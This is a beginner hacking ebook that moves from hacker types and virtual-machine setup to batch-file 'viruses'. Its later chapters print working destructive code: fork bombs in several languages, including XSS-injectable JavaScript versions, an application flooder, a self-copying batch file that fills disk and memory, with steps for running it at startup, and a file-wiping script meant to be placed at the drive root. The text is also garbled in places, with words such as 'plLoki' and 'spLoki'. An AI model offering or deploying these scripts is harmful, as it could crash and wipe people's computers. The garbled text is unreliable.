You are on page 1of 85

THECATALOGTIMES

HACKING AND ITS


BASICS
THIS IS WHAT YOU HAVE BEEN SEARCHING FOR

EMMANUEL AWM
HACKING AND
ITS BASICS

THIS IS WHAT YOU HAVE BEEN SEARCHING


FOR

EMMANUEL AWM

THECATALOGTIMES
This book formatting and alignments was made by Emmanuel A.W.M of
Thecatalogtimes Design; you can contact us for your publishing projects. All contents
is from the author Loki Zero and am not responsible for any copyright issues.

HACKING AND ITS BASICS


Copyright 2017 by Loki Zero

All right reserved. No part of this ebook may be used or reproduced in any manner
whatsoever without written permission except in the case of brief quotations em-
bodied in critical articles or reviews.
This book is a work of fiction. Names, characters, businesses, organiza- tions, plLokis,
events and incidents either are the product of the authors imagination or are used
fictitiously. Any resemblance to actual persons, living or dead, events, or locales is
entirely coincidental.

For information contact :


http://www.thecatalogtimes.wordpress.com

Book and Cover design by Thecatalogtimes Setup


ISBN: 132-778-078

First Edition: November 2017


Emmanuel AWM

CONTENTS
HACKING AND ITS BASICS .................................................................... II

CHAP TER O N E ........................................................................... 1

CHAP TER T W O .......................................................................... 4

CHAP TER T H R E E ............................................................... 10

CHAP TER F O U R .................................................................... 14

CHAP TER F I V E ...................................................................... 26

CHAP TER S I X ........................................................................... 46

CHAP TER S E V E N ................................................................ 58

CHAP TER E I G H T ................................................................. 68

CHAP TER N I N E ..................................................................... 72

CHAP TER T E N ........................................................................ 74

ABOUT THE AUTHOR ........................................................................... 77


Emmanuel AWM

CHAPTER ONE

What is Hacking?

A person who is able to discover a weakness in a system and


manages to exploit it is called a hacker and this process is
known as Hacking.

Hacking is an art. It is the mastery of a system that gives you


complete control over it. It is the act of modifying the inner
workings of a system, in order to make it do something that its
original creator never intended.

Thats the gist of it. But as with all things, the devil is in the
Emmanuel AWM

details. This is what this website is for.

Im going to make a broad claim here: The only thing you need
to become a hacker is interest and dedication. But more than
anything else, you need a thirst for knowledge. You should
always be willing to learn something new, always open to new
ideas. So come with me, follow along these series of tutorials
and before long youll see for yourself that the claim has been
justified.

Before moving on, theres a couple things that we need to


address.

First of all privacy. Your data is everywhere, a part of you


sitting on some servers around the world. Privacy is your right
to decide who can use that data and how. The internet as we
know it came into being decades ago. At the time, it wasnt
built with privacy in mind. But things have changed now. Not
only do we need to protect ourselves against malicious agents
but maybe, just maybe, a day may come when we must protect
ourselves from those who are meant to be protecting us, our

l2
governments. Because of this, hacking no longer means just
exploiting or patching up security holes in a system, it is now
also a means of protecting a basic human right, the right to
privacy.

Secondly, these days the only side of hacking that people hear
about is the bad one. Credit card theft, identity theft,
ransomware, stolen accounts and data and so on. The mere
word hacking brings with it an inherently negative vibe. It
doesnt have to be this way. We hear about millions of accounts
being leaked, attacks on major websites, attacks on individuals
but we near really hear about all the attacks that never
occurred. There is a whole other side to hacking that never
quite gets to see the light of day.

For every major hack that makes the news, many more are
prevented by security specialists. These people, these whitehat
hackers, possess exactly the same skillset as the blackhats, but
they choose to use them for good. No software can ever be
completely secure and that makes cyber security a cat and
mouse game. A rLoki between whitehats and blackhats. A
battle of angels and demons, the stakes of which have never
been higher than they are today. The global cost of cyber crime
is projected to reach $2 trillion by 2019.

3
Emmanuel AWM

CHAPTER TWO

Types of Hacker

To start halfway down So we know what hacking is, now lets


talk about hackers. There are a lot of things that distinguish
different kinds of hackers. Most importantly, skill and
motivations. That is,what are you trying to accomplish and how
far are you willing to go? This is the question I want you, the
reader, to ask yourself at the end of this article.

Script Kiddie

Script kiddies, in a word, are noobs. People who want to hack


for shortsighted selfish reasons without having any inclination
to actually learn something. These are the people whod rather

l4
spend their time looking for some secret tricks that they think
real hackers use. They may figure out how to use tools and
scripts made by others but they can neither make their own
tools nor do anything that involves a task more complex than
copy-pasting. A script kiddie is that one annoying kid in class
who pisses off everyone else. Dont be that guy.

Black hat

Black hat hackers are the bad guys. They are cyber criminals
with malicious intents whos only goal is personal gain or
sabotage. They are digital thieves money, they steal credit card
information, valuable data and identities. They infect systems
with viruses, trojans and malware and create botnets to do
their bidding. They cost the hardworking and honest people
around the world billions of dollars each year. Some do it out of
greed, some do it to show off while some others just want to
watch the world burn.

White hat

White hat hackers are the good guys who hack for improving
the security of systems. The field of penetration testing
involves probing a system, say a website or a companys
internal network, to look for vulnerabilities. The white hats (or
penetration testers) find these security flaws and help the

5
Emmanuel AWM

developers fix them. While the majority of the hacking process


is the same for white hats and black hats, theres a world of
difference when it comes to their intentions. White hats want
to help patch up vulnerabilities whereas black hats want to
exploit them.

Software security is one of the fastest growing fields today.


More and more companies are hiring security specialists as
well as offering bug bounty programs. Whether you simply
want a hobby or wish to go further, the world of cyber security
has you covered.

Grey hat hackers

These are the hackers who may work offensively or


defensively depending on the situation. Hackers who dont
have malicious intentions but still like to break into third-party
system just for the thrill and fun or maybe just to announce a
newfound vulnerabilty in a wild and supposedly heroic way.

l6
7
Emmanuel AWM

Case in point

Remember, breaking into a companys internal network


without authorization or taking a peek at a private database
just for fun is just as bad as malicious hacking in the eyes of the
law.

Hacktivists

These are the hackers who use their skills as a means of


protesting against injustice and protecting human rights such
as free speech. They attack a system or website to popularize a
notion or gather attention to a specific case for rectification.
They are vigilantes, the dark knights of the hacking universe.
This is where good intentions collide with the law, for
hacktivists may or may not carry out illegal activities to get
their point across to the world. They are outlaws who deliver
their own brand of rough
justice. Anonymous, LulzSec and WikiLeaks are a few notable
hacktivist groups.

Government

l8
The potential consequences of government hacking are so
enormous and far reaching that I feel compelled to put them in
a different category. Imagine an adversary that not only has
access to billions of dollars but also decides the laws in your
country. An adversary who wants control over every aspect of
your life. How do you defend against such an opponent?

This is increasingly becoming a global problem. Instead of


protecting the human right to privacy, governments around
the world are opting to violate it, following in the footsteps
of NSA and GCHQ. In the coming tutorials, protecting your
privacy is going to be an ever-present concern for us.

You

What about you? Which side are you on? Decided anything yet?
Dont worry, youll have plenty of time to figure it out. Every
single one of the above types of hackers make use of the same
hacking techniques. They all start out the same way, they all
learn the same things but they end up in vastly different
plLokis. No matter what you pick, remember that hacking is a
practical field and you will be on the front lines.

Now let us begin our journey by learning how to create viruses.


But before we can do that, lets get you all set up with a virtual
machine so that you dont accidentally wreck your computer.

9
Emmanuel AWM

Safety first, right?

CHAPTER THREE

More On Hacking

Who is a Hacker?

In computer networking, hacking is any technical effort to


manipulate the normal behavior of network connections and
connected systems. A hacker is any person engaged in hacking.
The term hacking historically referred to constructive, clever
technical work that was not necessarily related to computer
systems.

l10
Today, however, hacking and hackers are most commonly
associated with malicious programming attacks on the Internet
and other networks.

Origins of Hacking:

M.I.T. engineers in the 1950s and 1960s first popularized the


term and concept of hacking. Starting at the model train club
and later in the mainframe computer rooms, the so-called
hacks perpetrated by these hackers were intended to be
harmless technical experiments and fun learning activities.
Later, outside of M.I.T., others began applying the term to less
honorable pursuits. Before the Internet became popular, for
example, several hackers in the U.S. experimented with
methods to modify telephones for making free long-distance
calls over the phone network illegally.

As computer networking and the Internet exploded in


popularity, data networks became by far the most common
target of hackers and hacking.

11
Emmanuel AWM

Hacking vs. Cracking

Malicious attacks on computer networks are officially known


as cracking, while hacking truly applies only to activities
having good intentions. Most non-technical people fail to make
this distinction, however. Outside of academia, its extremely
common to see the term hack misused and be applied to
cracks as well.

Common Network Hacking Techniques

Hacking on computer networks is often done through scripts


or other network programming. These programs generally
manipulate data passing through a network connection in
ways designed to obtain more information about how the
target system works. Many such pre-packaged scripts are
posted on the Internet for anyone, typically entry-level
hackers, to use.

l12
More advanced hackers may study and modify these scripts to
develop new methods. A few highly skilled hackers work for
commercial firms with the job to protect that companys
software and data from outside hacking. Cracking techniques
on networks include creating worms, initiating denial of
service (DoS) attacks, or in establishing unauthorized remote
access connections to a device.

13
Emmanuel AWM

CHAPTER FOUR

Not Being A Noob

A Now that we have a basic grasp on ethical hacking, we need


to address something before we proceed further. The following
article assumes that you are a complete beginner and will
likely help you every step of the way in becoming a hacker.
This article is for anyone who wishes to communicate their
troubles efficiently and getting their questions answered
without uncalled-for rudeness. If you are a programmer or
have other considerable technical experience, feel free to skip
this one.

l14
The purpose of this course is to teach you hacking, but hacking
is really something that can only be self-taught. If you are
indeed serious about hacking, you will first have tolearn how
to learn.

Where to ask for help with hacking?

When learning something new, you are going to run into


problems. Everyone does, its all a part of the journey. Youll
find that there are plenty of online communities where you can
go and ask questions and just find help with something. A
couple of those are:

Information Security Stack Exchange

Reddit: /r/Hacking, /r/HowToHack, /r/netsec

15
Emmanuel AWM

And of course, theres me on twitter always happy to help with


any queries you may have.

How to ask for help?

Just Google it!

Please read the rules and code of conduct before


posting

If you cant do it, doesnt mean it doesnt work.

These are just some of the replies I frequently come across on


various blogs, forums and comment threads around the
internet. As a beginner, you need to understand that when
youre asking someone for help, youre asking a stranger to

l16
take time out of their day and devote it to you, another
stranger. It is your responsibility to prove that you are worth
helping.

So many online communities are full of friendly people willing


to help beginners get up to speed. And yet, noobs are still
everywhere:

Fake.. Doesnt work.

I tried but wasnt able to do this thing.. how do I do this


thing?

How to hack FB easily?

Need hacking tool for this online game..

17
Emmanuel AWM

You can see why these sorts of half-assed attempts at trying to


get someone else to do your work are often ignored and even
ridiculed. And in hacking, what these noobs are usually trying
to do is most likely selfish, unethical and even illegal. You are
not going to find help like this.

On the internet, you come across all sorts of people from all
walks of life. Most people at one point or another, encounter
someone who instead of answering or just ignoring a sincere
question or request, chooses to be rude and mocks the person
asking the question.

Why does this happen? Why do we still see so many pointless


conversations? Why so many questions that have been asked
and answered a million times still seem to stagger some? How
to get out of this vicious cycle? How to avoid coming across as a
noob and how to help others who are in fact not so different
than us? Its time someone answered these questions. So,
heres my attempt.

Admittedly, this may seem a bit general but not being a

l18
noob (or at least not looking like one) holds great importance
specially for beginner hackers. This is because the only way to
get help is from someone who has experience in this field. It
isnt hard to understand the lack of patience when it comes
dealing with people who are just looking for shortcuts instead
of trying to learn and contribute something.

When you ask for help online, its important to do so in a way


thats mindful of the readers time. Not only does this make it
more likely that youll receive a helpful reply but it also helps
other people with the same query who may find your page in
the future. This is how you ask a question:

Google before asking. Why waste your own and others


time when a question has already been answered
elsewhere? Google your question before posting it in a
forum or community.

Use proper grammar. If people cant understand you,


they cant answer your questions. If English isnt very
good, then you really should learn English first as the
majority of content on the internet (including hacking

19
Emmanuel AWM

tutorials) is in English.

Clearly state the problem. Mention what you are trying


to do and why you cannot seem to do so.

What all have you tried? Tell the readers what all
solutions you found on Google and that none of them
solved your problem which is why youre asking for
help.

Tell us your specs. Dont leave out any important


information that a reader may need to answer your
question. Mention all the relevant details such as your
operating system, version of software etc.

So long as you do this, you will receive polite and helpful


answers to all your questions and you will be making the
internet a better plLoki for everyone.

l20
A couple of points deserve to be explained further. These are
some common red flags that signal that the person asking a
question has only selfish interest in mind not learning.

Asking Google-able Questions

Yes, this again. Theres an awful lot of people on our little


planet. Say you want to go out to congratulate everyone who
has a birthday today and take 10 seconds per person.
Assuming a conservative average of 20 million birthdays a day,
it will take you over 6 years, if you went 24 hours a day,
everyday. By that time, of course the last person would have
aged 6 years and would not be very happy with you. Whats the
point of telling you this? Not only that statistics are fun but
more importantly: Theres an awful lot of people in the world.

With this in mind, theres a very good chance that when you
fLoki a problem, somewhere someone else has already fLokid
and overcome the same problem in the past. The answers are
right there on the internet, waiting to be googled.

21
Emmanuel AWM

Further, Google has a ridiculously large webpage index (over


30 trillion freaking pages). Say you type something in the
Google search bar, notice that it comes up with numerous
suggestions, millions of pages most of the time. That means
someone has probably typed that before. Its like almost
everything well ever think, has already been thought of by
someone else. Consequently, majority of what well ever search
on Google has already been searched by someone else and
theres a good chance that your problem has already been
solved.

So before doing anything else, you should always Google for a


solution to whatever problem you are facing. Not only is this
much quicker for you, but it saves others time as well. Life is
short. Learn to Google.

Asking unethical questions

This is a big issue in hacking. If your only goal is to hack your


ex-girlfriends fLokibook account or steal your neighbors WiFi
(all the while without having the slightest inclination towards

l22
educating yourself), while strangers on the internet cannot
stop you from trying to do such things, they are almost
certainly not going to help you.

I started this website ~4 years ago, in that time I have received


literally tens of thousands of request to hack someones
fLokibook account. I havent replied to a single such request
and I dont plan on ever doing so. To an expert hacker, when
someone asks a question, their intentions are immediately
clear. Noobs are not fooling anyone.

Your morality is up to you but do not expect others to help


realize your petty ambitions.

Expecting too much

Hacking is not magic. When a problem presents itself, a hacker


should break it down into logical steps and find a solution.
Movies have engraved in the minds of naive viewers that

23
Emmanuel AWM

expert hackers are practically magicians. According to movies,


an expert hacker might as well be typing any nonsense on
his/her keyboard (while blindfolded) and the greatest glories
and accomplishments can be achieved. Entire nations can be
supposedly hacked, gazillons of dollars await hackers just a
few keystrokes away and what not. According to movies,
tomorrow we may even see evil hackers burning our morning
toasts and remotely hacking into our mobile phones and
programming them to grow wings and fly off. No. Please stop.

To the astonishment of noobs, there is no top-secret program


that can suddenly turn them into an expert. When performing
any hacking technique, there are a set of steps one must carry
out methodically to attempt to hack something. Further, the
majority of the tools used are actually free, in fact most are
open-source. Remember Google-able questions? This is one of
them.

When a person asks a question about which they have little to


no knowledge, it is obviously going to drive away potential
respondents. What the person needs to understand is that the
respondent is doing them a favor. Nobody is going to sit down
and happily write a custom spoon-fed tutorial, so that the
person can then mindlessly follow it and obtain something

l24
they clearly do not deserve. Everyones time is valuable and if
the person is asking a total stranger for an unreasonably big
chunk, they are going to be ignored.

The world will always be moving fast and it is up to us to keep


up. Humanitys collective intelligence will always surpass any
individuals intelligence. It is for this reason, hackers, more
than any other groups, should learn to learn from and teach
others, peLokifully. Exchange of information and ideas are the
pillars keeping the hacker community alive, bonded and
continually rising to greater heights.

So thats that and now were finally ready to begin learning


hacking. Lets start by creating our very own viruses.

25
Emmanuel AWM

CHAPTER FIVE

Setting Up a Virtual Machine to


Practice Hacking

Now that weve got the introduction to hacking out of the


way, theres just one last thing left before we can actually start
hacking.

Due to the *ahem* sensitive nature of our field of work, I


recommend you use a virtual machine and not your personal
native OS for doing anything youre not familiar with. Virtual
machines are perfect for practicing hacking:
You can do whatever you want inside a VM and just
hit reset and youre back to a working OS

You can blow it up however you want, see what


happens when you delete important stuff and do
unspeakable things to it with zero risk of damaging your
actual system.

Its cross-platform. Are you on Windows? Mac? Linux?


Doesnt matter. You can run all of these inside each
other.

Its free. Officially free, that is, no need to pirate or


download from shady sources. (At least for Windows
and Linux)

In the following few tutorials, well need to use Windows. So


here were going to see how to setup a Windows Virtual
Machine. Eventually well move on to using Kali Linux for more

27
Emmanuel AWM

advanced hacking.

Now, lets get to it.

Step 1

For creating a virtual machine we need two things: the


virtualization software and the OS image file.

The Virtualization Software: I recommend


https://www.virtualbox.org/ . Its free and cross
platform.

The OS Image: You can find a bunch of Windows OS


images https://developer.microsoft.com/en-
us/microsoft-edge/tools/vms/ .

l28
29
Emmanuel AWM

The above link will take you here

Microsoft is currently offering Windows 7 through 10,


pick whichever you want. I picked Windows 10 Stable.

Make sure to select the right platform. For us


thats VirtualBox.

Click the download button (its about 4 GB).

If you encounter any issues, you can view installation


instructions.

These OS images that Microsoft is offering are meant for


testing and not normal usage. Its validity is 90 days after

l30
which well have to reset the virtual machine back to keep
using it. To do this, well take a snapshot of the initial state.
Using a snapshot is also an easy way to reset the virtual
machine back to a working state should something bad
happen, which it will because were here to practice hacking.

After the download is complete, you should have a zip file that
contains MSEdge - Win10_preview.ova. This is our image file.
Now we need to load it up into VirtualBox.

Step 2

Extract the .ova file somewhere and start VirtualBox. Click File
-> Import Appliance.

31
Emmanuel AWM

l32
Step 3

Now find your .ova file and click Next.

33
Emmanuel AWM

l34
Step 4

Click Import.

35
Emmanuel AWM

l36
Step 5

And now your virtual machine is setup, you should see


something like this:

37
Emmanuel AWM

l38
Step 6

Just a couple more things and then we can fire it up. Go


to Settings, then the Displaytab and increase the video memory
to 128 MB. This will allow you to use the virtual machine in full
screen and make it a bit more responsive.

39
Emmanuel AWM

l40
Step 7

Click Snapshot in the upper right corner and then


the camera button to create a snapshot. (Ideally, you should do
this before starting the virtual machine for the first time)

Step 8

41
Emmanuel AWM

l42
Step 9

And thats it. Hit Start and our virtual machine is ready to
handle all the abuse were about to throw at it. If When
something goes wrong, simply restore the snapshot and itll
work again.

43
Emmanuel AWM

l44
Now youre ready to test a variety of hacking techniques while
keeping your own system safe. The virtual machine effectively
acts as a sandbox, protecting you from yourself. In a future
tutorial, well expand upon this by setting up networking with
virtual machines, which allows you to do even more such as
practicing hacking webcams or penetration testing firewalls or
setting up man-in-the-middle attacks and so on.

We have a long and very interesting road ahead of us. But for
now, were going to start off with something small and
powerful. Say hello to batch file viruses.

person who is able to discover a weakness in a system and


manages to exploit it is called a hacker and this process is
known as Hacking.

45
Emmanuel AWM

CHAPTER SIX

Introduction to Batch File Viruses

N In the following few tutorials, well be learning about batch


file viruses. Well look at various techniques to bring down a
computer using small and simple scripts. Even if you have no
background in programming, youll find it very easy to follow
along.

I recommend you use a virtual machine running a Windows OS


if you want to follow along yourself. This is as much for safety

l46
as it is for convenience. This tutorial is pretty safe but from the
next one well start building viruses. The first virus well look
at will overload the computers memory. That is, the computer
will run out of RAM and likely freeze up and shut down. While
this is unlikely to cause any lasting damage, using a virtual
machine will still be more convenient simply because you
wont have to keep restarting your computer because it
crashed. Soon after this we will get to viruses that can do some
very real and permanent damage to your system. You dont
want to hack yourself, right? So you might as well learn how to
setup a virtual machine for hacking practice before continuing.

Now let us begin.

What are batch files?

A batch file is the name given to a type of script file, a text file
containing a series of commands to be executed by the
command interpreter. Batch files have the
extension.bat (or .cmd). They can be easily created using any
text editor such as notepad.

47
Emmanuel AWM

Now lets see some of these commands.


echo Hello World

The echo command is used to print out a message, in this case


Hello World. Type up the above in a text editor and save it
as something.bat. Now open it and a command window pops
up. But youll notice that it closes before we get a chance to see
what it outputs. Lets fix that.
echo Hello World

pause

The pause command pauses the execution of the batch file until
a user presses a key. You should now see the following output:
C:\Users\Loki\Desktop>echo Hello World

Hello World

C:\Users\Loki\Desktop>pause

l48
Press any key to continue . . .

C:\Users\Loki\Desktop> is where the execution is happening.


In my case, Ive saved the batch file on the desktop. The batch
file seems to be printing the commands before executing them.
It first prints echo Hello World then actually executes it to
outputHello World. Lets see if we can clean this up a bit.
@echo off

echo Hello World

pause

And this outputs


Hello World

49
Emmanuel AWM

Press any key to continue . . .

Much better. @echo off is used to stop the commands from


being printed and leaves only the output of those commands.
Now lets add a little dynamic behavior.
@echo off

set a=Loki

echo Hello %a%

pause

The set command is used to define variables that can hold


different values, in this case the string Loki. The variable
name enclosed within %% is how we access the value stored in

l50
the variable. Run the above and you should see
Hello Loki

Press any key to continue . . .

Be careful here, the set command is pretty sensitive about the


use of spLokis:

set a=Loki means a has the value Loki

set a= Loki (with a spLoki after the =) means a has the


value Loki (with a spLoki before it) and

set a =Loki (with a spLoki before =) means that the


variable is not defined as a but asa (a followed by a

51
Emmanuel AWM

spLoki).

Some commands come with modifiers that slightly alter their


behavior:
@echo off

set /a a=5

set /a b=10

set /a c=%a% + %b%

echo %c%

pause

In set /a, the /a part is telling set that it should treat the value
of the variable as a number, allowing us to perform
mathematical operations on it.
@echo off
set /p a=Enter your name:
echo Hello %a%

l52
pause

The /p modifier tells the set command that it should take in


some input from the user and store that in the variable a. When
you run the batch file, you will be prompted to enter
something. The output looks like:
Enter your name: Emily

Hello Emily

Press any key to continue . . .

Examples of Batch Files

53
Emmanuel AWM

That was pretty easy, now lets take a look at a couple more
batch files that might actually be useful and then well go and
make some viruses.

Pinger
@echo off

title Pinger

set /p target=Enter IP address or URL:

ping %target% -t

pause

This outputs:
Enter IP address or URL: google.com

Pinging google.com [216.58.220.206] with 32 bytes of data:

Reply from 216.58.220.206: bytes=32 time=26ms TTL=57

Reply from 216.58.220.206: bytes=32 time=25ms TTL=57

l54
Reply from 216.58.220.206: bytes=32 time=27ms TTL=57

Reply from 216.58.220.206: bytes=32 time=25ms TTL=57

Reply from 216.58.220.206: bytes=32 time=26ms TTL=57

Pretty handy if you want to quickly ping an IP address/URL or


check your internet connection.

P.S: Pressing CTRL+C forcefully stops any running command


(like ping -t which likes to run forever).

Shutdown timer

55
Emmanuel AWM

The batch file schedules a shutdown after X minutes.


@echo off

title Shutdown Input

set /p mins=Enter number of minutes to wait until shutdown


:

set /a mins=%mins%*60

shutdown -s -t %mins%

This was but a glimpse of what batch files can do. Almost
anything your operating system does for you can be done
through batch files. You can even use them to automate
repetitive and boring tasks. The limit is only your imagination.

One of these imaginative uses is creating batch file viruses and

l56
that is just what were going to learn now. Lets start with the
famous fork bomb.

57
Emmanuel AWM

CHAPTER SEVEN

Fork Bomb

The fork bomb is the equivalent of a DDoS attack on your own


system. It aims to deprive the system of memory (RAM),
leaving nothing for other applications or the operating
systems vital operations required to keep the systems
running, hence crashing it. Just 5 characters long, the fork
bomb is not permanently harmful for a computer, just
annoying.

Were now going to build on the introduction to batch files.


Make sure youve got a VM all set up and running.

l58
And here is the fork bomb:
%0|%0

Yes, this is it. The above is a shorter alternative for the


following more comprehensible code:
:s

start %0

goto s

Here, the first line creates a label s.

59
Emmanuel AWM

%0 actually refers to the name of the batch file itself.


By start %0 were running the same file again.

And finally goto s brings us back to the top, forming a


loop.

So every time the loop is run another instance of the same


program is started and then both of them run together and
again duplicate themselves and so on.

l60
Every program doubling itself is a form of exponential growth.
After one iteration of the loop, two programs (21) are created.
After another cycle, each of those
ose two create another two for a
total of four (22). After 10 iterations we have 1024 (210)
instances of our little batch file. After 100 iterations we have
2100 = 1.267 nonillion,, a number so big you dont even know
what nonillion is (Its 1030).

61
Emmanuel AWM

The first instance will likely not even complete 50 iterations


before the system grinds to a halt and crashes. For such a
simple script, each individual iteration would hardly take a few
milliseconds, so the first few iterations complete very quickly
and soon it becomes more than what the computer can handle.

Is there a way to protect against fork bombs? Yup.

Any antivirus worth its salt would be able to scan this


suspicious executable file and warn the user before execution.
As a fork bombs mode of operation is entirely dependent on
being able to create new processes, one way of preventing a
fork bomb from severely affecting the entire system is to limit
the maximum number of processes that a single user may own.
On Linux, this can be achieved by using the ulimit utility; for
example, the command ulimit -u 30 would limit the affected
user to a maximum of thirty owned processes.

And so we have our first little virus under our belt. Head over
to the next one to continue or scroll down if youre interested
in checking out the code for fork bomb in other common

l62
languages.

Bash

:(){ :|:& };:

Python

import os

while 1:

os.fork()

63
Emmanuel AWM

Java
public class ForkBomb

public static void main(String[] args)

while(true)

Runtime.getRuntime().exec(new String[]{"javaw"
, "-cp", System.getProperty("java.class.path"), "For
kBomb"});

Ruby

l64
loop { fork { load(__FILE__) } }

C
#include <unistd.h>

int main(void)

while(1) {

fork(); /* malloc can be used in order to incr


ease the data usage */

65
Emmanuel AWM

JavaScript
while (true) {

var w = window.open();

w.document.write(document.documentElement.outerHTM
L||document.documentElement.innerHTML);

The following version is easier for injection (XSS):


<a href="#" onload="function() { while (true) { var w = wi
ndow.open(); w.document.write(document.documentElement.out
erHTML||document.documentElement.innerHTML); } }">XSS fork
bomb</a>

And the following is simply a more aggressive version of the

l66
above:
<script>

setInterval(function() {

var w = window.open();

w.document.write(document.documentElement.outerHTML||doc
ument.documentElement.innerHTML);

}, 10);

</script>

67
Emmanuel AWM

CHAPTER EIGHT

Application Flooder

Not unlike the fork bomb we just saw, the Application


flooder although technically harmless, is a really annoying
virus. Heres how it looks:

@echo off

:begin

start mspaint

start notepad

l68
start write

start cmd

start explorer

start control

start calc

goto begin

Like all the other batch file virus tutorials, I recommend


trying this one out in a virtual machine.

Lets go through it line by line:

@echo off This simply stops the command prompts


from appearing when the batch file is executing.
When you start a batch file, a command prompt
process (cmd.exe) is opened and that batch files
instructions are piped through. We use @echo
off when we dont want to notify the user about what
the running batch file is doing.

:begin This is a label. Its like a marker or a


checkpoint, a position in the program that weve
given a name to.

start This is used to start an executable, similar to


what happens when you double click an application.

69
Emmanuel AWM

You can see that we have a bunch of these commands


and theyre all starting something different. These are
just a handful of the default programs that come with
all installations of windows. This is where
were flooding applications. Specifically were
starting up the applications: Paint, Notepad,
WordPad, a command window, file explorer, control
panel and a calculator. You can start up any
executable (.exe) by using start <PATH-TO-
EXECUTABLE>.

goto Remember the label we just defined above?


(:begin) Using the goto command, we go to the label
begin, and the program continues execution from
there. This is an infinite loop. So all the above
applications are started again and again until there
are hundreds of open windows or until the operating
system crashes or a good antivirus intervenes.

So there you have it. This is one of the most simplest and
oldest viruses out there. But the story isnt over yet. The
viruses that actually infect and harm the systems in this day
and age are vastly more complicated However, you are now
one step closer to a better understanding of the big picture.
Head over to the next virus to continue.

l70
71
Emmanuel AWM

CHAPTER NINE

Overloading Memory

This virus combines the best of the fork bomb and the application
flooder.

It creates a new batch file in the same directory and then copies itself
onto this new file. It then starts this new virus and then both of them
create another copy of themselves which are then run and the
process repeats over and over and we have an exponential growth in
the number of viruses on disk and in memory (RAM).

So lets have a look:

@echo off

:A

set x=%random%

type %0 >> %x%.bat

start %x%.bat

goto:A
Depending on what runs out first hard disk spLoki or RAM, the batch
file may or may not cause permanent damage. In both cases,
however, the computer will almost definitely crash, the operating
system may be corrupted and on the next start up, you will be
greeted by the well-known Blue Screen Of Death. The only way to
get rid of it will be to format your hard drive and re-install the
operating system.

(Optional) To make this file execute automatically at startup, Do the


following. Create a shortcut of the damage.bat file by right clicking
on it. Open the start menu, In programs Open Startup folder and
simply drag or cut-paste the shortcut into this folder. The virus will
break loose the next time the computer is started up.

These past couple of batch file viruses were, at best, annoying. Now
lets do some real damage. Next up, were going to be wiping out
memory.

73
Emmanuel AWM

CHAPTER TEN

Wiping Out Memory

No Now that weve learned how to overloaded the computers


memory, in this tutorial were going to wipe it all off. This is a short
and easy one. This is different than the other batch file viruses weve
seen yet. This can do real damage. Make sure you only run this inside
a VM.

del *.*

A quick refresher, the del command is used to delete files or folders


with the following syntax:

del [options] [/A:file_attributes] files_to_delete

For example: the command del fileName.extension will delete the file
fileName.extension in the current directory. * is a wildcard, it means
all. So *.* means all file names with any extensions. Putting a *
before the .(dot) means that no matter what the files name is, it will
be deleted. Putting a * after the . means that no matter what the files

l74
type is, it will be deleted. Combined, del *.* means that all files and
folders encountered by our script in the current
curre directory will be
wiped off completely

Clearly, this could be quite dangerous to a system as nothing will be


left, even the operating systems vital files may be deleted, when this
guy is done. But of course, it can only affect files in the directory
where the batch file itself is plLokid.
d. So, placing it at the root level
(say C:\deleteEverything.bat)
deleteEverything.bat) is the way to go.

How do we protect against it? For one, we have the principle of least
privilege (PoLP). In most modern operating, the problem of
accidental deletion of mission critical files is solved by the use of
user access levels. In Windows, if you try to delete something
important, you are sure to be greeted by:

You need to provide administrator privileges to delete some folder

If you try
ry to delete something really really important, the operating
system will simply deny doing so. Similarly, if you try to mess with
someone elses files (in a multi-user
user environment), you may not be
able to read, edit, execute (or all three) depending on what
wh

75
Emmanuel AWM

permissions they (the other user) and the admin has granted you
and by extension any scripts or programs you try to run.

Linux, on the other hand, is even more obsessive when it comes to


privileges. File permissions form a core part of nearly all Unix-like
systems. So, we hackers have our work cut out for us. Unfortunately
our cute little virus will likely not completely corrupt todays
systems. However, it can still wipe out any confidential documents
that your victim holds dear so it is still dangerous. If you wish to try
it out, fire up a virtual machine and let it rip.

Now lets try a different kind of virus. In The next drop Ebook , o
promise you wll love it, Up next, weve got the mighty folder blaster.

l76
ABOUT THE AUTHOR

The Author Loki Zero is a young vibrant anonemous


hacker, who has impacted knowledge into series of young
hackers , no other part of his personal information can be
disclose,
The Co-author Emmanuel AWM , a teenage writer ,
programmer, Web developer, Blogger and a tech guy with flare
for everything. He has written series of short novels tutorial
eBooks and lots more,

www.thecatalogtimes.wordpress.com

77
Emmanuel AWM
Emmanuel AWM

Thanks for reading! Please add a short review on


Amazon, EBS7

and let me know what you thought!

Its nice to have a final call to action like this in the back to
drive reviews. I would also add an optin offer, like download
the next book in the series for free!.

If this ebook was useful for you, why not share it with

your writer friends? You could even write a blog post about

this book, and link to www.ebs7.gq .

Thanks and good luck!

Emmanuel AWM